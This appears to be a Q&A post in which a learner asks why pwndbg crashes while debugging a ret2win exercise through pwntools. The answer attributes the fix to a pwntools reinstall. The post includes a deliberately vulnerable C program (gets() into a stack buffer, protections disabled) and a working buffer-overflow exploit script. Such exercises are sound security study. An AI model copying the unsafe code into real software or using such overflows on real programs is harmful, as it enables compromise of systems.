# pwndbg crashed while hook debuging, after send the payload

Tags: gdb, archlinux, pwntools

OS: Arch Linux x86_64

This is my source code:

```c
// gcc source.c -o vuln -no-pie -fno-stack-protector -z execstack -m32

#include <stdio.h>

void unsafe() {
    char buffer[40];

    puts("Overflow me");
    gets(buffer);
}

void main() {
    unsafe();
}

void flag() {
    puts("Exploited!!!!!");
}
```

This is my exploit script:

```py
from pwn import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

context.terminal = ['alacritty', '-e']

p = process('./vuln')

gdb.attach(p, 'b *0x080491aa')

payload = b'A' * 52
payload += p32(0x080491c3)

pause()
p.sendline(payload)

p.interactive()
```

Here is the commands i used in pwndbg interface:

```
pwndbg> r
Starting program: /home/cub3y0nd/Downloads/ret2win/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Overflow me
```

After use `r` command, i send new line in the exploit interface, then pwndbg crashed. This is exploit interface's contents:

```
λ ~ python exp.py
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
    b *0x080491aa
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
    b *0x080491aa
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb']
[DEBUG] Created script for new terminal:
    #!/usr/bin/python
    import os
    os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb'], os.environ)
[DEBUG] Launching a new terminal: ['/usr/bin/alacritty', '-e', '/tmp/tmpikuhhld1']
[+] Waiting for debugger: Done
[*] Paused (press any to continue)
[DEBUG] Sent 0x39 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000030  41 41 41 41  c3 91 04 08  0a                        │AAAA│····│·│
    00000039
[*] Process './vuln' stopped with exit code -9 (SIGKILL) (pid 175664)
Traceback (most recent call last):
  File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 702, in send_raw
    self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/cub3y0nd/Downloads/ret2win/exp.py", line 16, in <module>
    p.sendline(payload)
  File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 816, in sendline
    self.send(line + self.newline)
  File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 795, in send
    self.send_raw(data)
  File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 704, in send_raw
    raise EOFError
EOFError
```

I tried the same thing on other computer, but normal, pwndbg didn't crash.

I don't know where the problem is, I tried reinstall pwndbg and pwntools but that didn't solve the problem.

And everytime i open pwndbg i receive this warning: `/usr/share/pwndbg/gdbinit.py:10: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html import pkg_resources`. I don't know if this warning affects anything.

Please tell me how to solve this pwndbg hook debugging problem.

Answer (score 0):

I use pipx reinstall pwntools fix this problem.